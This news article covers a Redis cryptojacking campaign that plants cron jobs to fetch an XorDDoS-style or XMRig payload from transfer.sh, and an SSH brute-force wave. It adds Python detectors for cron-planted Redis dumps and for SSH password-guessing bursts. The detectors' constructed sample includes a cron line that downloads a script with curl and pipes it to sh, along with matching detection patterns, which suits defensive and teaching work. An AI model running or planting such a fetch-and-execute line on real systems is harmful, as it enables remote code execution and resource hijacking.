New Cryptojacking Campaign Leverages Misconfigured Redis Database Servers

March 2, 2023 / Ravie Lakshmanan / data security / cryptojacking


Improperly configured Redis database servers are being targeted in a new cryptojacking campaign that leverages a legitimate open source command-line file transfer service to carry out its attacks.

“What underpinned this campaign was the use of transfer[.]sh,” Cado Security said in a report shared with The Hacker News.

The cloud cybersecurity company added that the command-line interactivity of transfer[.]sh makes it an ideal tool for hosting and delivering malicious payloads.

The attack chain begins by targeting an insecure Redis deployment, followed by registering a cron job that, when parsed by the scheduler, leads to arbitrary code execution. This job is designed to retrieve the payloads hosted on transfer[.]sh.
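The article does not say how the cron job is planted, so the following is an added detection example rather than code from Cado's report. It assumes the widely documented technique in which an attacker points an unauthenticated Redis instance's dump file at a cron directory (via CONFIG SET dir / dbfilename and SAVE), so that the scheduler later parses a file that is really an RDB dump with a cron line embedded in it. The cron directory paths and the sample file contents, including the transfer.sh path, are constructed for the demonstration.

```python
import os
import re

# Places cron reads jobs from on common Linux layouts (assumption: Debian- and
# RHEL-style paths; adjust for your distribution).
CRON_DIRS = ("/etc/cron.d", "/var/spool/cron", "/var/spool/cron/crontabs")

# A Redis RDB dump begins with "REDIS" plus a four-digit format version.
RDB_MAGIC = re.compile(rb"\AREDIS\d{4}")

# Five schedule fields, then (after an optional user column) a downloader
# fetching from the hosting domain named in the report.
FETCH_RE = re.compile(
    rb"^(?:[\d*/,\-]+\s+){5}[^\n]*?(?:curl|wget)\b[^\n]*transfer\.sh/[^\n]*",
    re.MULTILINE,
)
PIPE_TO_SHELL_RE = re.compile(rb"\|\s*(?:ba)?sh\b")


def inspect_cron_blob(data: bytes) -> list:
    """Return indicator names found in one cron file's raw bytes."""
    findings = []
    if RDB_MAGIC.match(data):
        findings.append("rdb-header")      # the file is a Redis dump, not a hand-written crontab
    if b"\x00" in data:
        findings.append("binary-content")  # cron skips unparsable lines, so junk bytes are no obstacle
    for match in FETCH_RE.finditer(data):
        line = match.group(0).decode("latin-1").strip()
        findings.append("transfer.sh-fetch: " + line)
        if PIPE_TO_SHELL_RE.search(match.group(0)):
            findings.append("pipe-to-shell")
    return findings


def scan_cron_dirs(dirs=CRON_DIRS) -> dict:
    """Walk the cron directories and map each suspicious file to its findings."""
    hits = {}
    for base in dirs:
        for root, _dirs, files in os.walk(base):
            for name in files:
                path = os.path.join(root, name)
                try:
                    with open(path, "rb") as fh:
                        data = fh.read()
                except OSError:
                    continue  # unreadable or vanished file; keep going
                findings = inspect_cron_blob(data)
                if findings:
                    hits[path] = findings
    return hits


# Constructed sample: what a dump written by SAVE into the cron spool looks like,
# RDB framing around the planted value. The transfer.sh path is made up.
SAMPLE_FILES = {
    "/var/spool/cron/root": (
        b"REDIS0009\xfa\tredis-ver\x055.0.7\xfa\nredis-bits\xc0@\xfe\x00\xfb\x01\x00"
        b"\x00\x01x\x3f\n\n*/1 * * * * curl -fsSL https://transfer.sh/abc123/x.sh | sh\n\n"
        b"\xff\x12\x34\x56\x78\x9a\xbc\xde\xf0"
    ),
    "/etc/cron.d/backup": b"0 2 * * * root /usr/local/bin/backup.sh\n",
}


def scan_samples() -> dict:
    """Run the detector over the constructed samples (offline demonstration)."""
    return {path: inspect_cron_blob(data) for path, data in SAMPLE_FILES.items()}


if __name__ == "__main__":
    for path, findings in scan_samples().items():
        print(path, findings or "clean")
    for path, findings in scan_cron_dirs().items():
        print("LIVE", path, findings)
```

The RDB header check is the most reliable of the three indicators: a legitimate crontab is never a Redis dump, whereas the download-and-pipe pattern changes with every campaign. Run the live scan as root, since the spool directory is not world-readable.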

It is worth noting that similar attack mechanisms have been used in cryptojacking operations by other threat actors such as TeamTNT and WatchDog.

The payload is a script that paves the way for the XMRig cryptocurrency miner, but not before performing preparatory steps to free up memory, terminate competing miners, and install a network scanner utility called pnscan to find other vulnerable Redis servers and spread the infection.

“While the campaign clearly aims to hijack system resources for cryptocurrency mining, infection with this malware may have unintended consequences,” the company said. “Reckless configuration of the Linux memory management system can lead to data corruption and loss of system availability.”

The development makes it the latest threat to target Redis servers, following Redigo and HeadCrab in recent months.

The findings also come as Avertium disclosed a new wave of SSH brute-force attacks that deploy the XorDdos botnet malware on compromised servers with the aim of launching distributed denial-of-service (DDoS) attacks against targets located in China and the United States.

The cybersecurity firm said it observed 1.2 million unauthorized SSH connection attempts across 18 honeypots between October 6, 2022, and December 7, 2022. The activity has been attributed to a threat actor based in China.

42% of these attempts originated from 49 IP addresses assigned to the ChinaNet Jiangsu Province Network, with the rest coming from 8,000 IP addresses scattered around the world.

“Once the scan identified open ports, we found that a list of approximately 17,000 passwords could be used to brute force the ‘root’ account,” Avertium said. “After a successful brute force attack, an XorDDoS bot was installed.”
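The pattern Avertium describes, a burst of password failures against root followed by a success from the same source, is easy to pick out of sshd's logs. The following is an added example, not Avertium's tooling or anything from the report: it parses standard OpenSSH auth.log lines, groups failures per source address, and flags sources that exceed a threshold inside a time window, noting whether an accepted login followed. The log lines, the TEST-NET addresses, and the threshold and window values are constructed assumptions for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH auth.log lines (syslog timestamp without a year). Both shapes are
# standard sshd messages.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_events(text: str) -> list:
    """Return (timestamp, kind, user, ip) tuples in time order."""
    events = []
    for line in text.splitlines():
        match = FAILED_RE.match(line) or ACCEPTED_RE.match(line)
        if not match:
            continue
        # Syslog pads single-digit days with two spaces; collapse before parsing.
        stamp = datetime.strptime(re.sub(r"\s+", " ", match.group("ts")), "%b %d %H:%M:%S")
        kind = "failed" if match.re is FAILED_RE else "accepted"
        events.append((stamp, kind, match.group("user"), match.group("ip")))
    events.sort(key=lambda e: e[0])
    return events


def detect_bruteforce(text: str, threshold: int = 5, window_seconds: int = 60) -> list:
    """Flag sources with `threshold` failures inside the window; note a later success."""
    window = timedelta(seconds=window_seconds)
    per_ip = defaultdict(lambda: {"failures": [], "accepted": [], "users": set()})
    for stamp, kind, user, ip in parse_events(text):
        rec = per_ip[ip]
        rec["users"].add(user)
        rec["failures" if kind == "failed" else "accepted"].append(stamp)

    alerts = []
    for ip, rec in per_ip.items():
        fails = rec["failures"]
        # Any run of `threshold` consecutive failures that fits inside the window.
        burst = any(
            fails[i + threshold - 1] - fails[i] <= window
            for i in range(len(fails) - threshold + 1)
        )
        if not burst:
            continue
        # A success after the burst from the same source is the case that matters:
        # the password was guessed and a bot may now be installed.
        compromised = any(stamp > fails[0] for stamp in rec["accepted"])
        alerts.append({
            "ip": ip,
            "failures": len(fails),
            "users": sorted(rec["users"]),
            "compromised": compromised,
        })
    return sorted(alerts, key=lambda a: (-int(a["compromised"]), -a["failures"]))


# Constructed sample log: one source guessing root and succeeding, one source
# making two slow attempts against a non-existent user.
SAMPLE_LOG = """\
Oct  6 10:00:01 honeypot sshd[1201]: Failed password for root from 203.0.113.5 port 41022 ssh2
Oct  6 10:00:02 honeypot sshd[1203]: Failed password for root from 203.0.113.5 port 41024 ssh2
Oct  6 10:00:03 honeypot sshd[1205]: Failed password for root from 203.0.113.5 port 41026 ssh2
Oct  6 10:00:04 honeypot sshd[1207]: Failed password for root from 203.0.113.5 port 41028 ssh2
Oct  6 10:00:05 honeypot sshd[1209]: Failed password for root from 203.0.113.5 port 41030 ssh2
Oct  6 10:00:06 honeypot sshd[1211]: Failed password for root from 203.0.113.5 port 41032 ssh2
Oct  6 10:00:07 honeypot sshd[1213]: Accepted password for root from 203.0.113.5 port 41034 ssh2
Oct  6 10:05:00 honeypot sshd[1300]: Failed password for invalid user admin from 198.51.100.7 port 50001 ssh2
Oct  6 10:30:00 honeypot sshd[1301]: Failed password for invalid user admin from 198.51.100.7 port 50002 ssh2
"""


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The compromised flag is what turns a noisy brute-force alert into an incident: a source that guessed root's password is the one to isolate and examine for newly installed services. On real hosts, feed the function the output of `journalctl -u ssh` or the auth.log file, and pair it with disabling password authentication for root in sshd_config so the 17,000-entry wordlist has nothing to hit.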
